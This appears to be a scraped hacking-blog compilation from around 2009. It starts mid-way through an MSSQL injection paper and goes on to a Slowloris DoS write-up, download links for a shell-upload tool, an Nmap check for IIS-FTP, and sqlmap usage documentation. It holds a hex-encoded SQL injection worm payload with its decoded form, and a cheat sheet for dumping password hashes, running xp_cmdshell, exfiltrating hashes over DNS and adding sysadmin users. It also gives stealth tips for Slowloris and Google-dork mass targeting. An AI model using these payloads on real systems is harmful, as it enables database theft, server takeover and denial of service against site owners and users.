  in parameter will be consumed and display error message:

   "SQL Server does not exist or access denied"

  If port is open, the timeout would not be consumed and error messages will returned:

   "General network error. Check your network documentation"
   or
   "OLE DB provider 'sqloledb' reported an error. The provider did not give any information about the error."
  
  This technique, We will be able to map open ports on the IP addresses of hosts on the internal network (w00t !!)

  ** Note **
   This technique can use for Denial of Service (DoS). Just change port to some port such as: FTP (21), and change timeout too high (500).
  It's make many connections to target over FTP service (port 21)

 ++++++++++++++++++++++++++++++++++++++
  [0x04c] - Mass MSSQL Injection Worms
 ++++++++++++++++++++++++++++++++++++++
  
  Recently, we came across a particularly interesting type of SQL Injection that, at times, can be quite difficult to clean, 
 even with the most robust database backup and recovery scheme. This attack is conducted with the help of an Internet robotalso 
 known as malbotwhich attacks its prospects daily. It is likely that such a malbot fires the series of injection attempts continuously 
 and conditionally until the malicious script references are sensed on the targeted web pages. There is nothing new in the way that 
 the following T-SQL is injected. Yet, the generic nature of the script is somewhat interesting to see.

  
 [SQLi worm]---------------------------------------------------------------------------------
 ';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C004100520045002000400054002000760061007200630068006100720028003200350035
 0029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F004300
 7500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E
 0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E0073002000
 6200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D0027007500270020
 0061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F0072002000
 62002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D003100AS%20NVARCHAR(4000));EXEC(@S);--
 [End SQLi]----------------------------------------------------------------------------------

  When we decode this SQLi Code with Hex:

 [SQLi Decoded]------------------------------------------------------------------------------

 DECLARE @T VARCHAR(255)
 DECLARE @C VARCHAR(255)

 DECLARE Table_Cursor CURSOR FOR
 SELECT [A].[Name], [B].[Name]
 FROM sysobjects AS [A], syscolumns AS [B]
 WHERE [A].[ID] = [B].[ID] AND
 
 [A].[XType] = 'U' /* Table (User-Defined) */ AND
 ([B].[XType] = 99 /* NTEXT */ OR
 [B].[XType] = 35 /* TEXT */ OR
 [B].[XType] = 231 /* SYSNAME */ OR
 [B].[XType] = 167 /* VARCHAR */)
 
 OPEN Table_Cursor
 FETCH NEXT FROM Table_Cursor INTO @T,@C 
 
 WHILE (@@FETCH_STATUS = 0)
 
 BEGIN
 EXEC('UPDATE [' + @T + '] SET [' + @C + '] = RTRIM(CONVERT(VARCHAR, [' + @C + '])) + ''''')
 FETCH NEXT FROM Table_Cursor INTO @T, @C
 END
 
 CLOSE Table_Cursor
 DEALLOCATE Table_Cursor 
 
 [End SQLi]----------------------------------------------------------------------------------

  What happens as a result? It finds all text fields in the database and adds a link to malicious javascript 
  to each and every one of them which will make your website display them automatically. 
 So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring (a dynamic value such as 
 an article ID, product ID, etc) parameter and tried to use that to upload their SQL injection code.


######################################## 
 [0x05] - MSSQL Injection Cheat Sheet
########################################
 
  ** Some of the queries in the table below can only be run by an admin (SA Privilege). 
 These are marked with "-- priv" at the end of the query. **

 +---------------+---------------------------------------------------------------------------+
 |    Version    | SELECT @@version           |
 |---------------|---------------------------------------------------------------------------|
 |   Comments    | SELECT 1 -- comment           |
 |               | SELECT /*comment*/1           |
 |---------------|---------------------------------------------------------------------------|
 |  | SELECT user_name();           |
 |               | SELECT system_user;           |
 | Current User | SELECT user;            |
 |               | SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID      |
 |---------------|---------------------------------------------------------------------------|
 |  List Users   | SELECT name FROM master..syslogins         |
 |---------------|---------------------------------------------------------------------------|
 |  | MSSQL2000: SELECT name, password FROM master..sysxlogins -- priv     |
 |  |             |
 |      |      SELECT name, master.dbo.fn_varbintohexstr(password)            |
 |   |      FROM master..sysxlogins -- priv        |
 | List Password |             |
 |    Hashes | MSSQL2005: SELECT name, password_hash FROM        |
 |  |      master.sys.sql_logins -- priv        |
 |      |             |
 |  |      SELECT name + '-' +         |
 |  |      master.sys.fn_varbintohexstr(password_hash)      |
 |  |      FROM master.sys.sql_logins -- priv        |
 |---------------|---------------------------------------------------------------------------|
 |   | SELECT is_srvrolemember('sysadmin'); -- is your account a sysadmin?     |
 |  | returns 1 for true, 0 for false, NULL for invalid role.      |
 |  | Also try 'bulkadmin', 'systemadmin' and other values.       |
 |   List DBA |              |
 |   Accounts |             |
 |   | SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin?     |
 |  | return 1 for true, 0 for false, NULL for invalid role/username.     |
 |---------------|---------------------------------------------------------------------------|
 |   Current DB  | SELECT DB_NAME()           |
 |---------------|---------------------------------------------------------------------------|
 |     List | SELECT name FROM master..sysdatabases;        |
 |   Databases | SELECT DB_NAME(N); -- for N = 0, 1, 2, ...        |
 |---------------|---------------------------------------------------------------------------|
 |  | SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE   |       
 |  | name = 'mytable'); -- for the current DB only        |
 |  |             |
 | List Columns | SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM  |
 |  | master..syscolumns, master..sysobjects WHERE        |
 |  | master..syscolumns.id=master..sysobjects.id AND       |
 |  | master..sysobjects.name='sometable'; -- list colum names      |
 |  | and types for master..sometable         |
 |---------------|---------------------------------------------------------------------------|
 |  | SELECT name FROM master..sysobjects WHERE xtype = 'U';      |
 |  | (Use xtype = 'V' for views)          |
 |  | SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';      |
 |  |             |
 |  List Tables | SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype)     |
 |  | FROM master..syscolumns, master..sysobjects WHERE       |
 |  | master..syscolumns.id=master..sysobjects.id AND       |
 |  | master..sysobjects.name='sometable'; -- list column names and types     |
 |  | for master..sometable           |
 |---------------|---------------------------------------------------------------------------|
 |   | -- NB: This example works only for the current database.      |
 |  | If you wan't to search another db, you need to specify the db name     |
 |  Find Tables | (e.g. replace sysobject with mydb..sysobjects).       |
 |     From |             |
 |  Column Name | SELECT sysobjects.name as tablename, syscolumns.name as columnname     |
 |  | FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id     |
 |  | WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' --     |
 |  | this lists table, column for each column containing the word 'password'   |
 |---------------|---------------------------------------------------------------------------|
 |    Select | SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins     |
 |    Nth Row | ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row      |
 |---------------|---------------------------------------------------------------------------|
 |Select Nth Char| SELECT substring('abcd', 3, 1) -- returns c        |
 |---------------|---------------------------------------------------------------------------|
 |  Bitwise AND  | SELECT 6 & 2 -- returns 2          |
 |  | SELECT 6 & 1 -- returns 0          |
 |---------------|---------------------------------------------------------------------------|
 |  ASCII Value | SELECT char(0x41) -- returns A         |
 |   -> Char |             |
 |---------------|---------------------------------------------------------------------------|
 | Char -> ASCII | SELECT ascii('A') - returns 65         |
 |     Value |             |
 |---------------|---------------------------------------------------------------------------|
 |    Casting    | SELECT CAST('1' as int);          |
 |  | SELECT CAST(1 as char)          |
 |---------------|---------------------------------------------------------------------------|
 |    String | SELECT 'A' + 'B' - returns AB          |
 | Concatenation |             |
 |---------------|---------------------------------------------------------------------------|
 | If Statement  | IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1        |
 |---------------|---------------------------------------------------------------------------|
 |Case Statement | SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1       |
 |---------------|---------------------------------------------------------------------------|
 |Avoiding Quotes| SELECT char(65)+char(66) -- returns AB        |
 |---------------|---------------------------------------------------------------------------|
 |  Time Delay   | WAITFOR DELAY '0:0:5' -- pause for 5 seconds        |
 |---------------|---------------------------------------------------------------------------|
 |  | declare @host varchar(800); select @host = name FROM master..syslogins;   |
 |  | exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini''');     |
 |  | -- nonpriv, works on 2000          |
 |  |             |
 |  | declare @host varchar(800); select @host = name + '-' +      |
 |     Make | master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net'     |
 | DNS Requests | from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');|
 |  | -- priv, works on 2005          |
 |  |             |
 |  | -- NB: Concatenation is not allowed in calls to these SPs, hence why we   |
 |  | have to use @host.  Messy but necessary.        |
 |  | -- Also check out theDNS tunnel feature of sqlninja       |
 |---------------|---------------------------------------------------------------------------|
 |    Command | EXEC xp_cmdshell 'net user'; -- priv         |
 |   Execution   |             |
 |---------------|---------------------------------------------------------------------------|
 |     Local | CREATE TABLE mydata (line varchar(8000));        |
 |  File Access | BULK INSERT mydata FROM 'c:\boot.ini';        |
 |  | DROP TABLE mydata;           |
 |---------------|---------------------------------------------------------------------------|
 | Hostname, IP  | SELECT HOST_NAME()           |
 |---------------|---------------------------------------------------------------------------|
 | Create Users  | EXEC sp_addlogin 'user', 'pass'; -- priv        |
 |---------------|---------------------------------------------------------------------------|
 |  Drop Users   | EXEC sp_droplogin 'user'; -- priv         |
 |---------------|---------------------------------------------------------------------------|
 | Make User DBA | EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; -- priv     |
 +---------------+---------------------------------------------------------------------------+


########################################
 [0x06] - SQL Injection Countermeasures
########################################

 Main cause of SQL injection vulnerability is input validation. Many web developers do not provide
proper mechanism in order to sanitize any form of input. So, attackers take advantage of this point and gain access
to many databases. There are solutions to prevent SQL injection vulnerability.

 - Use whilelist input: because we cannot know all of bad inputs, so the efficient way is to allow only our known-valid input
 - Check input type: in some cases, attackers inject string into numeric input field or inject numeric into string input field, 
   these may cause SQL injection vulnerability
 - Escape database metacharacters: use / in order to escape database metacharacters by prepending / in front of metacharaters.
 - Don't ignore any ways of input: attackers can manipulate input to exploit SQL vulnerabilities, so you must not care only query string but also headers, 
   cookies and form fields as well
 - Use Parameterized Queries: MSSQL provides API for handling inputs which can help us to prevent SQL injection. 
   This mechanism is called "Parameterized Queries".

   The following two code samples illustrate the difference between an unsafe query dynamically constructed out of 
  user data, and its safe parameterized counterpart. 
 
   In the first, the user-supplied name parameter is embeded directly into a SQL statement, leaving the 
  application vulnerable to SQL injection:

   //define the query structure
   string queryText = "select ename,sak from emp where ename ='";
  
   //concatenate the user-supplied name
   queryText += request.getParameter("name");
   queryText += "'";
  
   //execute the query
   stmt = con.createStatement();
   rs = stmt.executeQuery(queryText);
 
   In the second example, the query structure is defined using a question mark as a placeholder 
  for the user-supplied parameter. The prepareStatement method is invoked to interpret this, and fix the structure 
  of the query that is to be executed. Only then is the setString method used to specify the actual value of 
  the parameter. Because the query's structure has already been fixed, this value can contain any data at all, 
  without affecting the structure. The query is then executed safely:

   //define the query structure
   String queryText = "select ename,sal from emp where ename = ?";
  
   //prepare the statement through DB connection "con"
   stmt = con.prepareStatement(queryText);
  
   //add the user input to variable 1 (at the first ? placeholder)
   stmt.setSting(1, request.getParameter("name"));
  
   //execute the query
   rs = stmt.executeQuery();


#####################
 [0x07] - References
#####################

[1] Error based SQL injection - a true story: AnalyseR
[2] Advanced SQL Injection In SQL Server Applications: Chris Anley
[3] ASCII Encoded/Binary String Automated SQL Injection Attack: Michael Zino
[4] http://pentestmonkey.net
[5] http://www.owasp.org
[6] http://www.milw0rm.com

####################
 [0x08] - Greetz To
####################
 
Greetz     : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com

    ----------------------------------------------------
 This paper is written for Educational purpose only. The authors are not responsible for any damage 
 originating from using this paper in wrong objective. If you want to use this knowledge with other person systems, 
    you must request for consent from system owner before
    ----------------------------------------------------

# milw0rm.com [2009-01-29]

Source:

http://www.milw0rm.com/papers/279

Slowloris HTTP DoS

2010-01-28T17:52:00.000-08:00

CCCCCCCCCCOOCCOOOOO888@8@8888OOOOCCOOO888888888@@@@@@@@@8@8@@@@888OOCooocccc::::
CCCCCCCCCCCCCCCOO888@888888OOOCCCOOOO888888888888@88888@@@@@@@888@8OOCCoococc:::
CCCCCCCCCCCCCCOO88@@888888OOOOOOOOOO8888888O88888888O8O8OOO8888@88@@8OOCOOOCoc::
CCCCooooooCCCO88@@8@88@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888@8888OOOCc::::
CooCoCoooCCCO8@88@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:
ooooooCoCCC88@88888@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88@888OCoccc
ooooCCOO8O888888888@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo
oCCCCCCO8OOOCCCOO88@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC
oCCCCCOOO88OCooCO88@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC
oCCCCOO88OOCCCCOO8@@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
CCCOOOO88OOCCOOO8@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
CCCOO88888OOCOO8@@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
OOOOOO88888OOOO8@8@8Ooc:.:...cOO8O88c.      .  .coOOO888OOOOCoooooccoCOOOOOCOOOO
OOOOO888@8@88888888Oo:. .  ...cO888Oc..          :oOOOOOOOOOCCoocooCoCoCOOOOOOOO
COOO888@88888888888Oo:.       .O8888C:  .oCOo.  ...cCCCOOOoooooocccooooooooCCCOO
CCCCOO888888O888888Oo. .o8Oo. .cO88Oo:       :. .:..ccoCCCooCooccooccccoooooCCCC
coooCCO8@88OO8O888Oo:::... ..  :cO8Oc. . .....  :.  .:ccCoooooccoooocccccooooCCC
:ccooooCO888OOOO8OOc..:...::. .co8@8Coc::..  ....  ..:cooCooooccccc::::ccooCCooC
.:::coocccoO8OOOOOOC:..::....coCO8@8OOCCOc:...  ....:ccoooocccc:::::::::cooooooC
....::::ccccoCCOOOOOCc......:oCO8@8@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
.......::::::::cCCCCCCoocc:cO888@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
.............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo
 ..... ............. .coocoooCCoco:::ccccccc:::ccc::..........  ....:::cc::::coC
   .  . ...    .... ..  .:cccoCooc:..  ::cccc:::c:.. ......... ......::::c:cccco
  .  .. ... ..    .. ..   ..:...:cooc::cccccc:.....  .........  .....:::::ccoocc
       .   .         .. ..::cccc:.::ccoocc:. ........... ..  . ..:::.:::::::ccco

Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client!
Written by RSnake with help from John Kinsella, and a dash of inspiration from Robert E Lee.
UPDATE 2: Video presentation of Slowloris at DefCon (the middle section of the presentation) can be seen here: Hijacking Web 2.0 Sites with SSLstrip and SlowLoris -- Sam Bowne and RSnake at Defcon 17.
UPDATE: Amit Klein pointed me to a post written by Adrian Ilarion Ciobanu written in early 2007 that perfectly describes this denial of service attack. It was also described in 2005 in the "Programming Model Attacks" section of Apache Security. So although there was no tool released at that time these two still technically deserves all the credit for this. I apologize for having missed these.
In considering the ramifications of a slow denial of service attack against particular services, rather than flooding networks, a concept emerged that would allow a single machine to take down another machine's web server with minimal bandwidth and side effects on unrelated services and ports. The ideal situation for many denial of service attacks is where all other services remain intact but the webserver itself is completely inaccessible. Slowloris was born from this concept, and is therefore relatively very stealthy compared to most flooding tools.

Slowloris holds connections open by sending partial HTTP requests. It continues to send subsequent headers at regular intervals to keep the sockets from closing. In this way webservers can be quickly tied up. In particular, servers that have threading will tend to be vulnerable, by virtue of the fact that they attempt to limit the amount of threading they'll allow. Slowloris must wait for all the sockets to become available before it's successful at consuming them, so if it's a high traffic website, it may take a while for the site to free up it's sockets. So while you may be unable to see the website from your vantage point, others may still be able to see it until all sockets are freed by them and consumed by Slowloris. This is because other users of the system must finish their requests before the sockets become available for Slowloris to consume. If others re-initiate their connections in that brief time-period they'll still be able to see the site. So it's a bit of a race condition, but one that Slowloris will eventually always win - and sooner than later.

Slowloris also has a few stealth features built into it. Firstly, it can be changed to send different host headers, if your target is a virtual host and logs are stored seperately per virtual host. But most importantly, while the attack is underway, the log file won't be written until the request is completed. So you can keep a server down for minutes at a time without a single log file entry showing up to warn someone who might watching in that instant. Of course once your attack stops or once the session gets shut down there will be several hundred 400 errors in the web server logs. That's unavoidable as Slowloris sits today, although it may be possible to turn them into 200 OK messages instead by completing a valid request, but Slowloris doesn't yet do that.

HTTPReady quickly came up as a possible solution to a Slowloris attack, because it won't cause the HTTP server to launch until a full request is recieved. This is true only for GET and HEAD requests. As long as you give Slowloris the switch to modify it's method to POST, HTTPReady turns out to be a worthless defense against this type of attack.

This is NOT a TCP DoS, because it is actually making a full TCP connection, not a partial one, however it is making partial HTTP requests. It's the equivalent of a SYN flood but over HTTP. One example of the difference is that if there are two web-servers running on the same machine one server can be DoSed without affecting the other webserver instance. Slowloris would also theoretically work over other protocols like UDP, if the program was modified slightly and the webserver supported it. Slowloris is also NOT a GET request flooder. Slowloris requires only a few hundred requests at long term and regular intervals, as opposed to tens of thousands on an ongoing basis.

Interestingly enough, in testing this has been shown in at least one instance to lock up database connections and force other strange issues and errors to arise that can allow for fingerprinting and other odd things to become obvious once the DoS is complete and the server attempts to clean itself up. I would guess that this issue arises when the webserver is allowed to open more connections than the database is, causing the database to fail first and for longer than the webserver.

Slowloris lets the webserver return to normal almost instantly (usually within 5 seconds or so). That makes it ideal for certain attacks that may just require a brief down-time. As described in this blog post, DoS is actually very useful for certain types of attacks where timing is key, or as a diversionary tactic, etc....
This affects a number of webservers that use threaded processes and ironically attempt to limit that to prevent memory exhaustion - fixing one problem created another. This includes but is not necessarily limited to the following:

Apache 1.x
Apache 2.x
dhttpd
GoAhead WebServer
WebSense "block pages" (unconfirmed)
Trapeze Wireless Web Portal (unconfirmed)
Verizon's MI424-WR FIOS Cable modem (unconfirmed)
Verizon's Motorola Set-Top Box (port 8082 and requires auth - unconfirmed)
BeeWare WAF (unconfirmed)
Deny All WAF (unconfirmed)

There are a number of webservers that this doesn't affect as well, in my testing:

IIS6.0
IIS7.0
lighttpd
Squid
nginx
Cherokee (verified by user community)
Netscaler
Cisco CSS (verified by user community)

This is obviously not a complete list, and there may be a number of variations on these web-servers that are or are not vulnerable. I didn't test every configuration or variant, so your mileage may vary. This also may not work if there is an upstream device that somehow limits/buffers/proxies HTTP requests. Please note though that Slowloris only represents one variant of this attack and other variants may have different impacts on other webservers and upstream devices. This command should work on most systems, but please be sure to check the options as well:
perl slowloris.pl -dns example.com
Requirements: This is a Perl program requiring the Perl interpreter with the modules IO::Socket::INET, IO::Socket::SSL, and GetOpt::Long. Slowloris works MUCH better and faster if you have threading, so I highly encourage you to also install threads and threads::shared if you don't have those modules already. You can install modules using CPAN:

perl -MCPAN -e 'install IO::Socket::INET'
perl -MCPAN -e 'install IO::Socket::SSL'

Windows users: You probably will not be able to successfuly execute a Slowloris denial of service from Windows even if you use Cygwin. I have not had any luck getting Slowloris to successfuly deny service from within Windows, because Slowloris requires more than a few hundred sockets to work (sometimes a thousand or more), and Windows limits sockets to around 130, from what I've seen. I highly suggest you use a *NIX operating system to execute Slowloris from for the best results, and not from within a virtual machine, as that could have unexpected results based on the parent operating system.
Version: Slowloris is currently at version 0.7 - 06/17/2009

Download: slowloris.pl

Getting started: perldoc slowloris.pl
Issues: For a complete list of issues look at the Perl documentation, which explains all of the things to think about when running this denial of service attack.
Thanks: Thank you to John Kinsella for the help with threading and id and greyhat for help with testing.

Reference:
http://ha.ckers.org/slowloris/

Uploading Shell Through SQL Injection [Into Outfile]

2009-10-20T09:11:00.000-07:00

Uploading Shell Through SQL Injection [Into Outfile]

http://rapidshare.com/files/22917340/mysql_into_outfile.rar.html

http://rapidshare.de/files/46569137/mysql_into_outfile.zip.html
Pass: security-shell.ws

Detecting Vulnerable IIS-FTP Hosts Using Nmap

2009-09-04T15:41:00.000-07:00

Based on an existing Nmap script, I quickly wrote a new one which performs the following actions:

* Check if anonymous sessions are allowed.
* Check if the detected FTP server is running Microsoft ftpd.
* Check if the MKDIR command is allowed (this seems to be required by the exploit)

If all those conditions are met, the script exits with a warning message. Note that my script will only report servers which could be vulnerable. On the other side, running a server with anonymous users able to create directories is a major security breach and must be fixed independently of the newly discovered vulnerability!

To use the Nmap script, copy it in your local script repositoty (something like /usr/local/share/nmap/scripts/) and rebuild your scripts index:

# nmap --script-updatedb

Then, the script will be executed against all detected FTP servers (using the “-Sc” argument) or you can specify only one script to be executed (for speed):

# nmap -p 21 -sV --script=IIS-FTP 10.0.0.7

Starting Nmap 4.76 ( http://nmap.org ) at 2009-09-01 01:15 CEST
Interesting ports on test-win (10.0.0.7):
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ IIS FTP: IIS Server allow anonymous and mkdir (potentially vulnerable)
Service Info: OS: Windows

The script is available here. Note that it is provided “as is”. it’s just a quick hack which worked for me.

Maybe you were not aware of the Nmap scripting capabilities. Feel free to read this small introduction to Nmap scripting.

Reference:
http://blog.rootshell.be/2009/09/01/detecting-vulnerable-iis-ftp-hosts-using-nmap/

sqlmap 0.7

2009-08-23T10:12:00.000-07:00

Consider that the target url is:

http://192.168.1.121/sqlmap/mysql/get_int.php?id=1

Assume that:

http://192.168.1.121/sqlmap/mysql/get_int.php?id=1+AND+1=1

is the same page as the original one and:

http://192.168.1.121/sqlmap/mysql/get_int.php?id=1+AND+1=2

Usage
$ python sqlmap.py -h

sqlmap/0.7
by Bernardo Damele A. G.

Usage: sqlmap.py [options]

Options:
--version show program's version number and exit
-h, --help show this help message and exit
-v VERBOSE Verbosity level: 0-5 (default 1)

Target:
At least one of these options has to be specified to set the source to
get target urls from.

-u URL, --url=URL Target url
-l LIST Parse targets from Burp or WebScarab logs
-g GOOGLEDORK Process Google dork results as target urls
-c CONFIGFILE Load options from a configuration INI file

Request:
These options can be used to specify how to connect to the target url.

--method=METHOD HTTP method, GET or POST (default GET)
--data=DATA Data string to be sent through POST
--cookie=COOKIE HTTP Cookie header
--referer=REFERER HTTP Referer header
--user-agent=AGENT HTTP User-Agent header
-a USERAGENTSFILE Load a random HTTP User-Agent header from file
--headers=HEADERS Extra HTTP headers newline separated
--auth-type=ATYPE HTTP Authentication type (value Basic or Digest)
--auth-cred=ACRED HTTP Authentication credentials (value name:password)
--proxy=PROXY Use a HTTP proxy to connect to the target url
--threads=THREADS Maximum number of concurrent HTTP requests (default 1)
--delay=DELAY Delay in seconds between each HTTP request
--timeout=TIMEOUT Seconds to wait before timeout connection (default 30)
--retries=RETRIES Retries when the connection timeouts (default 3)

Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and how to parse and compare HTTP
responses page content when using the blind SQL injection technique.

-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to this value
--os=OS Force back-end DBMS operating system to this value
--prefix=PREFIX Injection payload prefix string
--postfix=POSTFIX Injection payload postfix string
--string=STRING String to match in page when the query is valid
--regexp=REGEXP Regexp to match in page when the query is valid
--excl-str=ESTRING String to be excluded before comparing page contents
--excl-reg=EREGEXP Matches to be excluded before comparing page contents

Techniques:
These options can be used to test for specific SQL injection technique
or to use one of them to exploit the affected parameter(s) rather than
using the default blind SQL injection technique.

--stacked-test Test for stacked queries (multiple statements) support
--time-test Test for time based blind SQL injection
--time-sec=TIMESEC Seconds to delay the DBMS response (default 5)
--union-test Test for UNION query (inband) SQL injection
--union-tech=UTECH Technique to test for UNION query SQL injection
--union-use Use the UNION query (inband) SQL injection to retrieve
the queries output. No need to go blind

Fingerprint:
-f, --fingerprint Perform an extensive DBMS version fingerprint

Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements.

-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes (opt -U)
--privileges Enumerate DBMS users privileges (opt -U)
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables (opt -D)
--columns Enumerate DBMS database table columns (req -T opt -D)
--dump Dump DBMS database table entries (req -T, opt -D, -C)
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--start=LIMITSTART First query output entry to retrieve
--stop=LIMITSTOP Last query output entry to retrieve
--sql-query=QUERY SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell

File system access:
These options can be used to access the back-end database management
system underlying file system.

--read-file=RFILE Read a file from the back-end DBMS file system
--write-file=WFILE Write a local file on the back-end DBMS file system
--dest-file=DFILE Back-end DBMS absolute filepath to write to

Operating system access:
This option can be used to access the back-end database management
system underlying operating system.

--os-cmd=OSCMD Execute an operating system command
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an out-of-band shell, meterpreter or VNC
--os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
--os-bof Stored procedure buffer overflow exploitation
--priv-esc User priv escalation by abusing Windows access tokens
--msf-path=MSFPATH Local path where Metasploit Framework 3 is installed
--tmp-path=TMPPATH Remote absolute path of temporary files directory

Miscellaneous:
--eta Display for each output the estimated time of arrival
--update Update sqlmap to the latest stable version
-s SESSIONFILE Save and resume all data retrieved on a session file
--save Save options on a configuration INI file
--batch Never ask for user input, use the default behaviour
--cleanup Clean up the DBMS by sqlmap specific UDF and tables

5.1 Output verbosity

Option: -v

Verbose options can be used to set the verbosity level of output messages. There exist six levels. The default level is 1 in which information, warnings, errors and tracebacks, if they occur, will be shown. Level 2 shows also debug messages, level 3 shows also HTTP requests with all HTTP headers sent, level 4 shows also HTTP responses headers and level 5 shows also HTTP responses page content.

Example on a MySQL 5.0.67 target (verbosity level 1):

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1

[hh:mm:12] [INFO] testing connection to the target url
[hh:mm:12] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:14] [INFO] url is stable
[hh:mm:14] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[hh:mm:14] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[hh:mm:14] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:14] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:14] [INFO] GET parameter 'id' is dynamic
[hh:mm:14] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[hh:mm:14] [INFO] testing unescaped numeric injection on GET parameter 'id'
[hh:mm:14] [INFO] confirming unescaped numeric injection on GET parameter 'id'
[hh:mm:14] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
[hh:mm:14] [INFO] testing for parenthesis on injectable parameter
[hh:mm:14] [INFO] the injectable parameter requires 0 parenthesis
[hh:mm:14] [INFO] testing MySQL
[hh:mm:14] [INFO] query: CONCAT(CHAR(53), CHAR(53))
[hh:mm:14] [INFO] retrieved: 55
[hh:mm:14] [INFO] performed 20 queries in 0 seconds
[hh:mm:14] [INFO] confirming MySQL
[hh:mm:14] [INFO] query: LENGTH(CHAR(53))
[hh:mm:14] [INFO] retrieved: 1
[hh:mm:14] [INFO] performed 13 queries in 0 seconds
[hh:mm:14] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1
[hh:mm:14] [INFO] retrieved: 5
[hh:mm:14] [INFO] performed 13 queries in 0 seconds
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0

To run sqlmap on a single target URL.

Example on a MySQL 5.0.67 target:

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1"

[...]
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0

Process Google dork results as target urls

Option: -g

It is also possible to test and inject on GET parameters on the results of your Google dork.

This option makes sqlmap negotiate with the search engine its session cookie to be able to perform a search, then sqlmap will retrieve Google first 100 results for the Google dork expression with GET parameters asking you if you want to test and inject on each possible affected URL.

Example of Google dorking with expression site:yourdomain.com ext:php:

$ python sqlmap.py -g "site:yourdomain.com ext:php" -v 1

[hh:mm:38] [INFO] first request to Google to get the session cookie
[hh:mm:40] [INFO] sqlmap got 65 results for your Google dork expression, 59 of them are
testable hosts
[hh:mm:41] [INFO] sqlmap got a total of 59 targets
[hh:mm:40] [INFO] url 1:
GET http://yourdomain.com/example1.php?foo=12, do you want to test this
url? [y/N/q] n
[hh:mm:43] [INFO] url 2:
GET http://yourdomain.com/example2.php?bar=24, do you want to test this
url? [y/N/q] n
[hh:mm:42] [INFO] url 3:
GET http://thirdlevel.yourdomain.com/news/example3.php?today=483, do you
want to test this url? [y/N/q] y
[hh:mm:44] [INFO] testing url http://thirdlevel.yourdomain.com/news/example3.php?today=483
